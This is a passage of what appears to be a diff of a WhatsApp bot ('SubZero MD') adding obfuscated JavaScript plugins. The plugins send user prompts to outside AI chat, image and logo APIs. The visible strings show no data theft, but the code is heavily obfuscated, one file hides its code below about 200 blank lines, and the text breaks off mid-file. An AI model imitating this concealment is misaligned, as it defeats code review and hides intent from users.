config=require(_0x2ab262(0x1e5)),{cmd,commands}=require(_0x2ab262(0x1e6)),{fetchJson}=require(_0x2ab262(0x1d9));cmd({'pattern':'ai','alias':[_0x2ab262(0x202),_0x2ab262(0x1fb)],'react':'🤖','desc':_0x2ab262(0x1da),'category':_0x2ab262(0x1e7),'filename':__filename},async(_0x52e423,_0x4c1453,_0x1ec353,{from:_0x299960,quoted:_0x386cd2,body:_0x421275,isCmd:_0x8e6e99,command:_0x25332f,args:_0x4feda2,q:_0x5856f8,isGroup:_0x49f4dc,sender:_0x3081ba,senderNumber:_0x1af908,botNumber2:_0x2854f8,botNumber:_0x57b2b6,pushname:_0x5ce04c,isMe:_0x3ee314,isOwner:_0xdfabec,groupMetadata:_0x4546bd,groupName:_0x2438a2,participants:_0x585871,groupAdmins:_0x51f056,isBotAdmins:_0x2e789b,isAdmins:_0x405914,reply:_0xb51d46})=>{const _0x6e25f5=_0x2ab262;try{if(!_0x5856f8)return _0xb51d46(_0x6e25f5(0x1f6));const _0x601a6d=await fetchJson('https://api.davidcyriltech.my.id/ai/gpt4omini?text='+_0x5856f8);console[_0x6e25f5(0x1f5)](_0x601a6d);if(!_0x601a6d['message'])return _0xb51d46('No\x20response\x20from\x20the\x20AI.');return _0xb51d46('\x20`🤖\x20SUBZERO\x20AI\x20RESPONSE:`\x20\x0a\x0a'+_0x601a6d[_0x6e25f5(0x1f3)]);}catch(_0x1cb55f){console['error'](_0x1cb55f),_0xb51d46(_0x6e25f5(0x204)+_0x1cb55f[_0x6e25f5(0x1f3)]);}}),cmd({'pattern':_0x2ab262(0x1eb),'alias':[_0x2ab262(0x1f4),_0x2ab262(0x1e2)],'react':'🪄','desc':'AI\x20chat.','category':_0x2ab262(0x1e7),'filename':__filename},async(_0x2055c7,_0x5163c1,_0x5a816b,{from:_0x394f8b,quoted:_0x46e36c,body:_0x473b97,isCmd:_0x260a81,command:_0x51eb57,args:_0xef9866,q:_0x256da7,isGroup:_0x6aed05,sender:_0x1dcc6c,senderNumber:_0x408602,botNumber2:_0x3861d0,botNumber:_0x557b4d,pushname:_0x481fcc,isMe:_0x584908,isOwner:_0x26a429,groupMetadata:_0x198f8a,groupName:_0x3dee59,participants:_0x6b855c,groupAdmins:_0x46b714,isBotAdmins:_0x3942cf,isAdmins:_0x5a97f8,reply:_0x357176})=>{const _0x3d300a=_0x2ab262;try{if(!_0x256da7)return _0x357176(_0x3d300a(0x1f6));const _0x4ba5a9=await fetchJson('https://pikabotzapi.vercel.app/ai/mistral/?apikey=anya-md&message='+_0x256da7);console[_0x3d300a(0x1f5)](_0x4ba5a9);if(!_0x4ba5a9[_0x3d300a(0x1f3)])return _0x357176(_0x3d300a(0x1fa));return _0x357176(_0x3d300a(0x1f1)+_0x4ba5a9[_0x3d300a(0x1f3)]);}catch(_0x4a92af){console['error'](_0x4a92af),_0x357176('An\x20error\x20occurred:\x20'+_0x4a92af['message']);}}),cmd({'pattern':_0x2ab262(0x1f0),'alias':[_0x2ab262(0x1ff),_0x2ab262(0x201)],'react':'😇','desc':_0x2ab262(0x1da),'category':_0x2ab262(0x1e7),'filename':__filename},async(_0x1c491d,_0xa3419b,_0x582f27,{from:_0x226731,quoted:_0x724fdc,body:_0x2086c0,isCmd:_0x259bb8,command:_0x441bc0,args:_0x39e6e8,q:_0x59a656,isGroup:_0x5ac62b,sender:_0x576f9a,senderNumber:_0x8e99ba,botNumber2:_0x220cf6,botNumber:_0x20fa68,pushname:_0x21ff3a,isMe:_0x531b28,isOwner:_0x5e4c4b,groupMetadata:_0x14f206,groupName:_0x25bdca,participants:_0x245a4b,groupAdmins:_0x3794ef,isBotAdmins:_0x2f475b,isAdmins:_0x3bff22,reply:_0x4f8193})=>{const _0x16b4db=_0x2ab262;try{if(!_0x59a656)return _0x4f8193('Please\x20ask\x20a\x20question\x20or\x20provide\x20input\x20for\x20the\x20AI.');const _0x568cf0=await fetchJson(_0x16b4db(0x1e9)+_0x59a656);console[_0x16b4db(0x1f5)](_0x568cf0);if(!_0x568cf0[_0x16b4db(0x1f3)])return _0x4f8193('No\x20response\x20from\x20the\x20AI.');return _0x4f8193(_0x16b4db(0x1ec)+_0x568cf0[_0x16b4db(0x1f3)]);}catch(_0x5ea3b7){console['error'](_0x5ea3b7),_0x4f8193('An\x20error\x20occurred:\x20'+_0x5ea3b7[_0x16b4db(0x1f3)]);}}),cmd({'pattern':'gpt4','alias':['ai4','chatgpt4'],'react':'🪄','desc':'AI\x20chat.','category':_0x2ab262(0x1e7),'filename':__filename},async(_0x3a46d8,_0x3875b3,_0x2a4a16,{from:_0x2ca488,quoted:_0x40bdcf,body:_0x411c96,isCmd:_0x23066c,command:_0x14f8fc,args:_0x2bf533,q:_0xae983d,isGroup:_0x1146e0,sender:_0x5b7426,senderNumber:_0x4c0ffb,botNumber2:_0x595471,botNumber:_0x576b01,pushname:_0x247f7b,isMe:_0x436fb0,isOwner:_0x58ea99,groupMetadata:_0x531b18,groupName:_0xae18ba,participants:_0x46d747,groupAdmins:_0x254946,isBotAdmins:_0xa4964f,isAdmins:_0x524b9a,reply:_0xcab4f0})=>{const _0x4e733b=_0x2ab262;try{if(!_0xae983d)return _0xcab4f0(_0x4e733b(0x1f6));const _0x2e3d5b=await fetchJson(_0x4e733b(0x1f9)+_0xae983d);console[_0x4e733b(0x1f5)](_0x2e3d5b);if(!_0x2e3d5b[_0x4e733b(0x1f3)])return _0xcab4f0(_0x4e733b(0x1fa));return _0xcab4f0('\x20`🤖\x20SUBZERO\x20CHATGPT\x204:`\x20\x0a\x0a'+_0x2e3d5b[_0x4e733b(0x1f3)]);}catch(_0x3dbe5a){console['error'](_0x3dbe5a),_0xcab4f0('An\x20error\x20occurred:\x20'+_0x3dbe5a[_0x4e733b(0x1f3)]);}}),cmd({'pattern':_0x2ab262(0x1e1),'alias':[_0x2ab262(0x1db),_0x2ab262(0x203)],'react':'✅','desc':_0x2ab262(0x1da),'category':'main','filename':__filename},async(_0x1d69dd,_0xe4ea2a,_0x3c6515,{from:_0x484e15,quoted:_0x39d80e,body:_0x1e21fe,isCmd:_0x463313,command:_0xaac0a9,args:_0x1c55e8,q:_0x120802,isGroup:_0x1039e1,sender:_0x449777,senderNumber:_0x171d4a,botNumber2:_0x45abee,botNumber:_0x44cb07,pushname:_0x421f03,isMe:_0x578408,isOwner:_0x5199df,groupMetadata:_0x53b4cb,groupName:_0x88973b,participants:_0x5bf9e8,groupAdmins:_0x4db630,isBotAdmins:_0x222330,isAdmins:_0x3cc38b,reply:_0x508b3f})=>{const _0x36b918=_0x2ab262;try{if(!_0x120802)return _0x508b3f('Please\x20ask\x20a\x20question\x20or\x20provide\x20input\x20for\x20the\x20AI.');const _0xf262be=await fetchJson(_0x36b918(0x1fc)+_0x120802);console['log'](_0xf262be);if(!_0xf262be['message'])return _0x508b3f(_0x36b918(0x1fa));return _0x508b3f('\x20`🤖\x20SUBZERO\x20LLAM\x20AI:`\x20\x0a\x0a'+_0xf262be['message']);}catch(_0x3a5c5b){console[_0x36b918(0x1f8)](_0x3a5c5b),_0x508b3f('An\x20error\x20occurred:\x20'+_0x3a5c5b[_0x36b918(0x1f3)]);}}),cmd({'pattern':_0x2ab262(0x1f7),'alias':[_0x2ab262(0x1df),_0x2ab262(0x1ea)],'react':'🔄','desc':'AI\x20chat.','category':_0x2ab262(0x1e7),'filename':__filename},async(_0x4903fd,_0x3e3939,_0x5710cf,{from:_0x2a308c,quoted:_0xae54eb,body:_0xa4e1c2,isCmd:_0x1a0697,command:_0x2dd020,args:_0x2fb7e3,q:_0x9dd37e,isGroup:_0x1ac256,sender:_0x4ed8bf,senderNumber:_0x3aeaa6,botNumber2:_0x399560,botNumber:_0x28184b,pushname:_0x2fa2d9,isMe:_0x1f9d67,isOwner:_0x44c2fa,groupMetadata:_0x4b1ccd,groupName:_0x2343a6,participants:_0x38b7ce,groupAdmins:_0x3a4bba,isBotAdmins:_0x473528,isAdmins:_0x4683be,reply:_0xf11ce1})=>{const _0x2befe2=_0x2ab262;try{if(!_0x9dd37e)return _0xf11ce1(_0x2befe2(0x1f6));const _0x2f840f=await fetchJson('https://api.davidcyriltech.my.id/ai/metaai?text='+_0x9dd37e);console[_0x2befe2(0x1f5)](_0x2f840f);if(!_0x2f840f[_0x2befe2(0x1f3)])return _0xf11ce1(_0x2befe2(0x1fa));return _0xf11ce1('\x20`🤖\x20SUBZERO\x20META\x20AI:`\x20\x0a\x0a'+_0x2f840f[_0x2befe2(0x1f3)]);}catch(_0x425b6e){console['error'](_0x425b6e),_0xf11ce1(_0x2befe2(0x204)+_0x425b6e[_0x2befe2(0x1f3)]);}}),cmd({'pattern':'gpt4o','alias':['ai4','chatgpt4'],'react':'🟢','desc':_0x2ab262(0x1da),'category':_0x2ab262(0x1e7),'filename':__filename},async(_0x38b68a,_0x1e0cf6,_0x101250,{from:_0x44ac96,quoted:_0x22b3c8,body:_0xe52dc1,isCmd:_0x1c6e5e,command:_0x5a59c1,args:_0x884c5f,q:_0x42eef8,isGroup:_0x44d0c4,sender:_0x72e5b0,senderNumber:_0x556c41,botNumber2:_0x56d97e,botNumber:_0x466e17,pushname:_0xd5f894,isMe:_0x3e7b1e,isOwner:_0x15ba7f,groupMetadata:_0x235e88,groupName:_0x1cedff,participants:_0x1b998f,groupAdmins:_0x4ee091,isBotAdmins:_0x1ea0e4,isAdmins:_0x3efbc1,reply:_0x13db3e})=>{const _0x235397=_0x2ab262;try{if(!_0x42eef8)return _0x13db3e(_0x235397(0x1f6));const _0x8f7c24=await fetchJson(_0x235397(0x1f9)+_0x42eef8);console[_0x235397(0x1f5)](_0x8f7c24);if(!_0x8f7c24[_0x235397(0x1f3)])return _0x13db3e(_0x235397(0x1fa));return _0x13db3e(_0x235397(0x1dc)+_0x8f7c24['message']);}catch(_0x2a7260){console[_0x235397(0x1f8)](_0x2a7260),_0x13db3e(_0x235397(0x204)+_0x2a7260[_0x235397(0x1f3)]);}}),cmd({'pattern':_0x2ab262(0x200),'alias':['bard','bing'],'react':'⏳','desc':_0x2ab262(0x1da),'category':_0x2ab262(0x1e7),'filename':__filename},async(_0xb41935,_0x4df8fe,_0xc37a77,{from:_0x4d8dae,quoted:_0x353ffb,body:_0x4888ac,isCmd:_0x3e798f,command:_0x51bb4a,args:_0x28a1aa,q:_0x492360,isGroup:_0x27135f,sender:_0x45ad5c,senderNumber:_0x1c7bb1,botNumber2:_0x5e32f8,botNumber:_0x15d02e,pushname:_0x3acfd2,isMe:_0x58337e,isOwner:_0x21118b,groupMetadata:_0x533247,groupName:_0x327182,participants:_0x40701f,groupAdmins:_0x11e9c3,isBotAdmins:_0x2bc106,isAdmins:_0x48c896,reply:_0x46860c})=>{const _0x52a9c0=_0x2ab262;try{if(!_0x492360)return _0x46860c('Please\x20ask\x20a\x20question\x20or\x20provide\x20input\x20for\x20the\x20AI.');const _0x3f9f02=await fetchJson('https://api.davidcyriltech.my.id/ai/gpt4omini?text='+_0x492360);console['log'](_0x3f9f02);if(!_0x3f9f02[_0x52a9c0(0x1f3)])return _0x46860c(_0x52a9c0(0x1fa));return _0x46860c(_0x52a9c0(0x1ef)+_0x3f9f02[_0x52a9c0(0x1f3)]);}catch(_0x1019cf){console[_0x52a9c0(0x1f8)](_0x1019cf),_0x46860c('An\x20error\x20occurred:\x20'+_0x1019cf[_0x52a9c0(0x1f3)]);}});
|
plugins/ai-nothing.js
ADDED
@@ -0,0 +1,4 @@
|
|
|
|
|
|
|
|
|
|
|
1 |
+
// Iam Aware of you code copier
|
2 |
+
// fuck you bro
|
3 |
+
|
4 |
+
const _0x497100=_0x11ff;(function(_0x2bcc81,_0x16e903){const _0xe4c066=_0x11ff,_0x54a515=_0x2bcc81();while(!![]){try{const _0x119185=parseInt(_0xe4c066(0xb6))/0x1+parseInt(_0xe4c066(0xa7))/0x2+-parseInt(_0xe4c066(0xb9))/0x3+-parseInt(_0xe4c066(0xa6))/0x4*(-parseInt(_0xe4c066(0xa9))/0x5)+-parseInt(_0xe4c066(0xba))/0x6+-parseInt(_0xe4c066(0xa4))/0x7+-parseInt(_0xe4c066(0xad))/0x8*(-parseInt(_0xe4c066(0xa3))/0x9);if(_0x119185===_0x16e903)break;else _0x54a515['push'](_0x54a515['shift']());}catch(_0x59f9c0){_0x54a515['push'](_0x54a515['shift']());}}}(_0x590b,0x5b223));function hi(){const _0x567d91=_0x11ff;console[_0x567d91(0xb2)](_0x567d91(0xa1));}function _0x590b(){const _0x3916de=['An\x20error\x20occurred:\x20','../command','619166xpclhE','error','Generate\x20an\x20image\x20using\x20AI.','2156994ISqnLJ','112188OeDYNm','main','Hello\x20World!','sendMessage','36TrHMgf','3823120SwSlRN','sd2','2022104NCNiir','308590Njbbel','../config','5yGpYxE','imagine2','../lib/functions','https://api.giftedtech.web.id/api/ai/fluximg?apikey=gifted&prompt=','756304yCJrwk','message','Please\x20provide\x20a\x20prompt\x20for\x20the\x20image.','pixel','>\x20*Subzero\x20Imagining\x20Your\x20image...*','log','result'];_0x590b=function(){return _0x3916de;};return _0x590b();}function _0x11ff(_0x5bcb1e,_0x16dff7){const _0x590b44=_0x590b();return _0x11ff=function(_0x11ff8b,_0x4f7008){_0x11ff8b=_0x11ff8b-0xa1;let _0x35bc6=_0x590b44[_0x11ff8b];return _0x35bc6;},_0x11ff(_0x5bcb1e,_0x16dff7);}hi();const config=require(_0x497100(0xa8)),{cmd,commands}=require(_0x497100(0xb5)),{fetchJson}=require(_0x497100(0xab));cmd({'pattern':_0x497100(0xb0),'alias':[_0x497100(0xa5),_0x497100(0xaa)],'react':'🌟','desc':_0x497100(0xb8),'category':_0x497100(0xbb),'filename':__filename},async(_0x5a78f8,_0x7467dd,_0x47db20,{from:_0x2cd9e2,quoted:_0x4ae6ac,body:_0x5d3a1b,isCmd:_0x10b35a,command:_0x3b26d5,args:_0x1beb7d,q:_0x25348c,isGroup:_0x29e57a,sender:_0x58962b,senderNumber:_0x1eb72c,botNumber2:_0x4b362a,botNumber:_0x1c59e7,pushname:_0x57356a,isMe:_0x4bf42d,isOwner:_0x379775,groupMetadata:_0xe66faa,groupName:_0x3c2091,participants:_0x3d14a2,groupAdmins:_0x2c4a72,isBotAdmins:_0x1abdfe,isAdmins:_0x4bfc83,reply:_0x447e6b})=>{const _0x203efc=_0x497100;try{if(!_0x25348c)return _0x447e6b(_0x203efc(0xaf));await _0x447e6b(_0x203efc(0xb1));let _0x42e10a=await fetchJson(_0x203efc(0xac)+_0x25348c);const _0x3aeeab=_0x42e10a[_0x203efc(0xb3)];await _0x5a78f8[_0x203efc(0xa2)](_0x47db20['chat'],{'image':{'url':_0x3aeeab,'caption':'Generated\x20by\x20Subzero'}});}catch(_0x381f93){console[_0x203efc(0xb7)](_0x381f93),_0x447e6b(_0x203efc(0xb4)+_0x381f93[_0x203efc(0xae)]);}});
|
plugins/ai-stablediffusion.js
ADDED
@@ -0,0 +1 @@
|
|
|
|
|
1 |
+
const _0x4b19aa=_0x8d7e;(function(_0x438255,_0x316f6e){const _0x2d6f06=_0x8d7e,_0x318cb8=_0x438255();while(!![]){try{const _0x3a001f=-parseInt(_0x2d6f06(0xb7))/0x1+-parseInt(_0x2d6f06(0xb5))/0x2*(-parseInt(_0x2d6f06(0xb2))/0x3)+-parseInt(_0x2d6f06(0xab))/0x4+parseInt(_0x2d6f06(0xad))/0x5+-parseInt(_0x2d6f06(0xa8))/0x6+-parseInt(_0x2d6f06(0xb3))/0x7+parseInt(_0x2d6f06(0xbd))/0x8*(parseInt(_0x2d6f06(0xb0))/0x9);if(_0x3a001f===_0x316f6e)break;else _0x318cb8['push'](_0x318cb8['shift']());}catch(_0x30588e){_0x318cb8['push'](_0x318cb8['shift']());}}}(_0x4722,0xeaa13));function hi(){console['log']('Hello\x20World!');}hi();function _0x8d7e(_0x4c1f6d,_0x5052cb){const _0x472295=_0x4722();return _0x8d7e=function(_0x8d7ef0,_0x4055c0){_0x8d7ef0=_0x8d7ef0-0xa8;let _0x2a82f5=_0x472295[_0x8d7ef0];return _0x2a82f5;},_0x8d7e(_0x4c1f6d,_0x5052cb);}const config=require(_0x4b19aa(0xb6)),{cmd,commands}=require(_0x4b19aa(0xaf)),{fetchJson}=require(_0x4b19aa(0xbc));function _0x4722(){const _0x2c8842=['Subzero\x20Diffussing\x20Your\x20image...','2994970UfXAMZ','stablediffussion','../command','36300357ZOJIAI','Please\x20provide\x20a\x20prompt\x20for\x20the\x20image.','12dSppIv','12166980MFozAo','https://api.giftedtech.web.id/api/ai/fluximg?apikey=gifted&prompt=','849994ZTWZWk','../config','573041dBCfsD','Generate\x20an\x20image\x20using\x20AI\x20api.','imagine2','result','chat','../lib/functions','8KZfvFk','8403042SjsMtx','error','fun','6638496KNzhwD'];_0x4722=function(){return _0x2c8842;};return _0x4722();}cmd({'pattern':_0x4b19aa(0xae),'alias':['sd',_0x4b19aa(0xb9)],'react':'🎉','desc':_0x4b19aa(0xb8),'category':_0x4b19aa(0xaa),'filename':__filename},async(_0x36af40,_0x3d61ee,_0x1d2b7b,{from:_0xea2597,quoted:_0x48293c,body:_0x46d832,isCmd:_0x38d313,command:_0x41bd67,args:_0x555589,q:_0x338d29,isGroup:_0x146911,sender:_0x909cea,senderNumber:_0x1a80ee,botNumber2:_0x39e539,botNumber:_0xc69267,pushname:_0x5f1aec,isMe:_0x30c779,isOwner:_0x263a74,groupMetadata:_0x3b17f8,groupName:_0x41a12c,participants:_0x47f706,groupAdmins:_0x19e440,isBotAdmins:_0x33aae4,isAdmins:_0x45997f,reply:_0x1dd9a7})=>{const _0x701c39=_0x4b19aa;try{if(!_0x338d29)return _0x1dd9a7(_0x701c39(0xb1));await _0x1dd9a7(_0x701c39(0xac));let _0x19e0c0=await fetchJson(_0x701c39(0xb4)+_0x338d29);const _0x217b9b=_0x19e0c0[_0x701c39(0xba)];await _0x36af40['sendMessage'](_0x1d2b7b[_0x701c39(0xbb)],{'image':{'url':_0x217b9b}});}catch(_0x575536){console[_0x701c39(0xa9)](_0x575536),_0x1dd9a7('An\x20error\x20occurred:\x20'+_0x575536['message']);}});
|
plugins/convert-logo.js
ADDED
@@ -0,0 +1,221 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
/*
|
2 |
+
|
3 |
+
$$$$$$\ $$\
|
4 |
+
$$ __$$\ $$ |
|
5 |
+
$$ / \__|$$\ $$\ $$$$$$$\ $$$$$$$$\ $$$$$$\ $$$$$$\ $$$$$$\
|
6 |
+
\$$$$$$\ $$ | $$ |$$ __$$\ \____$$ |$$ __$$\ $$ __$$\ $$ __$$\
|
7 |
+
\____$$\ $$ | $$ |$$ | $$ | $$$$ _/ $$$$$$$$ |$$ | \__|$$ / $$ |
|
8 |
+
$$\ $$ |$$ | $$ |$$ | $$ | $$ _/ $$ ____|$$ | $$ | $$ |
|
9 |
+
\$$$$$$ |\$$$$$$ |$$$$$$$ |$$$$$$$$\ \$$$$$$$\ $$ | \$$$$$$ |
|
10 |
+
\______/ \______/ \_______/ \________| \_______|\__| \______/
|
11 |
+
|
12 |
+
Project Name : SubZero MD
|
13 |
+
Creator : Darrell Mucheri ( Mr Frank OFC )
|
14 |
+
Repo : https//github.com/mrfrank-ofc/SUBZERO-MD
|
15 |
+
Support : wa.me/18062212660
|
16 |
+
*/
|
17 |
+
|
18 |
+
|
19 |
+
|
20 |
+
|
21 |
+
|
22 |
+
|
23 |
+
|
24 |
+
|
25 |
+
|
26 |
+
|
27 |
+
|
28 |
+
|
29 |
+
|
30 |
+
|
31 |
+
|
32 |
+
|
33 |
+
|
34 |
+
|
35 |
+
|
36 |
+
|
37 |
+
|
38 |
+
|
39 |
+
|
40 |
+
|
41 |
+
|
42 |
+
|
43 |
+
|
44 |
+
|
45 |
+
|
46 |
+
|
47 |
+
|
48 |
+
|
49 |
+
|
50 |
+
|
51 |
+
|
52 |
+
|
53 |
+
|
54 |
+
|
55 |
+
|
56 |
+
|
57 |
+
|
58 |
+
|
59 |
+
|
60 |
+
|
61 |
+
|
62 |
+
|
63 |
+
|
64 |
+
|
65 |
+
|
66 |
+
|
67 |
+
|
68 |
+
|
69 |
+
|
70 |
+
|
71 |
+
|
72 |
+
|
73 |
+
|
74 |
+
|
75 |
+
|
76 |
+
|
77 |
+
|
78 |
+
|
79 |
+
|
80 |
+
|
81 |
+
|
82 |
+
|
83 |
+
|
84 |
+
|
85 |
+
|
86 |
+
|
87 |
+
|
88 |
+
|
89 |
+
|
90 |
+
|
91 |
+
|
92 |
+
|
93 |
+
|
94 |
+
|
95 |
+
|
96 |
+
|
97 |
+
|
98 |
+
|
99 |
+
|
100 |
+
|
101 |
+
|
102 |
+
|
103 |
+
|
104 |
+
|
105 |
+
|
106 |
+
|
107 |
+
|
108 |
+
|
109 |
+
|
110 |
+
|
111 |
+
|
112 |
+
|
113 |
+
|
114 |
+
|
115 |
+
|
116 |
+
|
117 |
+
|
118 |
+
|
119 |
+
|
120 |
+
|
121 |
+
|
122 |
+
|
123 |
+
|
124 |
+
|
125 |
+
|
126 |
+
|
127 |
+
|
128 |
+
|
129 |
+
|
130 |
+
|
131 |
+
|
132 |
+
|
133 |
+
|
134 |
+
|
135 |
+
|
136 |
+
|
137 |
+
|
138 |
+
|
139 |
+
|
140 |
+
|
141 |
+
|
142 |
+
|
143 |
+
|
144 |
+
|
145 |
+
|
146 |
+
|
147 |
+
|
148 |
+
|
149 |
+
|
150 |
+
|
151 |
+
|
152 |
+
|
153 |
+
|
154 |
+
|
155 |
+
|
156 |
+
|
157 |
+
|
158 |
+
|
159 |
+
|
160 |
+
|
161 |
+
|
162 |
+
|
163 |
+
|
164 |
+
|
165 |
+
|
166 |
+
|
167 |
+
|
168 |
+
|
169 |
+
|
170 |
+
|
171 |
+
|
172 |
+
|
173 |
+
|
174 |
+
|
175 |
+
|
176 |
+
|
177 |
+
|
178 |
+
|
179 |
+
|
180 |
+
|
181 |
+
|
182 |
+
|
183 |
+
|
184 |
+
|
185 |
+
|
186 |
+
|
187 |
+
|
188 |
+
|
189 |
+
|
190 |
+
|
191 |
+
|
192 |
+
|
193 |
+
|
194 |
+
|
195 |
+
|
196 |
+
|
197 |
+
|
198 |
+
|
199 |
+
|
200 |
+
|
201 |
+
|
202 |
+
|
203 |
+
|
204 |
+
|
205 |
+
|
206 |
+
|
207 |
+
|
208 |
+
|
209 |
+
|
210 |
+
|
211 |
+
|
212 |
+
|
213 |
+
|
214 |
+
|
215 |
+
|
216 |
+
|
217 |
+
|
218 |
+
|
219 |
+
|
220 |
+
|
221 |
+
const _0xbfdeb2=_0x12a3;(function(_0x4ee0bd,_0x405211){const _0x506a53=_0x12a3,_0x29a9be=_0x4ee0bd();while(!![]){try{const _0x367e17=parseInt(_0x506a53(0x21b))/0x1*(-parseInt(_0x506a53(0x1f0))/0x2)+-parseInt(_0x506a53(0x1ff))/0x3*(parseInt(_0x506a53(0x20a))/0x4)+parseInt(_0x506a53(0x1ef))/0x5*(-parseInt(_0x506a53(0x1f2))/0x6)+parseInt(_0x506a53(0x206))/0x7+parseInt(_0x506a53(0x1f6))/0x8+parseInt(_0x506a53(0x205))/0x9*(parseInt(_0x506a53(0x1fb))/0xa)+parseInt(_0x506a53(0x202))/0xb;if(_0x367e17===_0x405211)break;else _0x29a9be['push'](_0x29a9be['shift']());}catch(_0x197157){_0x29a9be['push'](_0x29a9be['shift']());}}}(_0xd94a,0x7c853));function _0x12a3(_0x16aa25,_0x12003a){const _0xd94ae7=_0xd94a();return _0x12a3=function(_0x12a3ee,_0xd28128){_0x12a3ee=_0x12a3ee-0x1ef;let _0x354680=_0xd94ae7[_0x12a3ee];return _0x354680;},_0x12a3(_0x16aa25,_0x12003a);}function _0xd94a(){const _0x405964=['\x0a╼╼╼╼╼╼╼╼╼╼╼╼╼╼╼╼╼➻\x0a\x0a*🔢\x20Rᴇᴘʟʏ\x20Tʜᴇ\x20Nᴜᴍʙᴇʀ\x20Yᴏᴜ\x20Wᴀɴᴛ\x20➠*\x0a\x0a\x201\x20➠\x20Bʟᴀᴄᴋ\x20Pɪɴᴋ\x0a\x202\x20➠\x20Bʟᴀᴄᴋ\x20Pɪɴᴋ\x202\x0a\x203\x20➠\x20Sɪʟᴠᴇʀ\x203ᴅ\x0a\x204\x20➠\x20Nᴀʀᴜᴛᴏ\x0a\x205\x20➠\x20Dɪɢɪᴛᴀʟ\x20Gʟɪᴛᴄʜ\x0a\x206\x20➠\x20Pɪxᴇʟ\x20Gʟɪᴛᴄʜ\x0a\x207\x20➠\x20Cᴏᴍɪᴄ\x20Sᴛʏʟᴇ\x0a\x208\x20➠\x20Nᴇᴏɴ\x20Lɪɢʜᴛ\x0a\x209\x20➠\x20Fʀᴇᴇ\x20Bᴇᴀʀ\x0a10\x20➠\x20Dᴇᴠɪʟ\x20Wɪɴɢꜱ\x0a11\x20➠\x20Sᴀᴅ\x20Gɪʀʟ\x0a12\x20➠\x20Lᴇᴀᴠᴇꜱ\x0a13\x20➠\x20Dʀᴀɢᴏɴ\x20Bᴀʟʟ\x0a14\x20➠\x20Hᴀɴᴅ\x20Wʀɪᴛᴛᴇɴ\x0a15\x20➠\x20Nᴇᴏɴ\x20Lɪɢʜᴛ\x20\x0a16\x20➠\x203ᴅ\x20Cᴀꜱᴛʟᴇ\x20Pᴏᴘ\x0a17\x20➠\x20Fʀᴏᴢᴇɴ\x20ᴄʀɪꜱᴛᴍᴀꜱꜱ\x0a18\x20➠\x203ᴅ\x20Fᴏɪʟ\x20Bᴀʟʟᴏɴꜱ\x0a19\x20➠\x203ᴅ\x20Cᴏʟᴏᴜʀꜰᴜʟ\x20Pᴀɪɴᴛ\x0a20\x20➠\x20Aᴍᴇʀɪᴄᴀɴ\x20Fʟᴀɢ\x203ᴅ\x0a\x0a>\x20©\x20Gᴇɴᴇʀᴀᴛᴇᴅ\x20Bʏ\x20SᴜʙZᴇʀᴏ\x20⚡','https://api-pink-venom.vercel.app/api/logo?url=https://en.ephoto360.com/create-a-3d-castle-pop-out-mobile-photo-effect-786.html&name=','Hello\x20World!','https://api-pink-venom.vercel.app/api/logo?url=https://en.ephoto360.com/create-pixel-glitch-text-effect-online-769.html&name=','log','https://api-pink-venom.vercel.app/api/logo?url=https://en.ephoto360.com/create-online-3d-comic-style-text-effects-817.html&name=','*_Invalid\x20number.Please\x20reply\x20a\x20valid\x20number._*','contextInfo','https://api-pink-venom.vercel.app/api/logo?url=https://en.ephoto360.com/create-a-blackpink-style-logo-with-members-signatures-810.html&name=','36941FaXrqe','sendMessage','https://api-pink-venom.vercel.app/api/logo?url=https://en.ephoto360.com/create-dragon-ball-style-text-effects-online-809.html&name=','640365iWsMqE','10tMNTZP','https://api-pink-venom.vercel.app/api/logo?url=https://en.ephoto360.com/create-a-frozen-christmas-text-effect-online-792.html&name=','6wFbfGX','https://api-pink-venom.vercel.app/api/logo?url=https://en.ephoto360.com/free-bear-logo-maker-online-673.html&name=','120363304325601080@newsletter','*🌟\x20SUBZERO-MD\x20LOGO\x20MAKER\x20🌟*\x0a\x0a╼╼╼╼╼╼╼╼╼╼╼╼╼╼╼╼╼➻\x0a*◈ᴛᴇxᴛ\x20:*\x20','482832ZgmaHB','extendedTextMessage','https://api-pink-venom.vercel.app/api/logo?url=https://en.ephoto360.com/create-3d-colorful-paint-text-effect-online-801.html&name=','logo','message','50rDSlbu','result','*_Please\x20give\x20me\x20a\x20text.\x20Eg\x20*.logo\x20Mr\x20Frank*_*','❄️\x20𝐒𝐔𝐁𝐙𝐄𝐑𝐎\x20𝐌𝐃\x20❄️','3bBgrdq','https://api-pink-venom.vercel.app/api/logo?url=https://en.ephoto360.com/free-online-american-flag-3d-text-effect-generator-725.html&name=','Create\x20logos','10675764SsRWII','https://api-pink-venom.vercel.app/api/logo?url=https://en.ephoto360.com/create-typography-status-online-with-impressive-leaves-357.html&name=','messages.upsert','116064NzeZeB','3394650gwFRcx','https://api-pink-venom.vercel.app/api/logo?url=https://en.ephoto360.com/online-blackpink-style-logo-maker-ef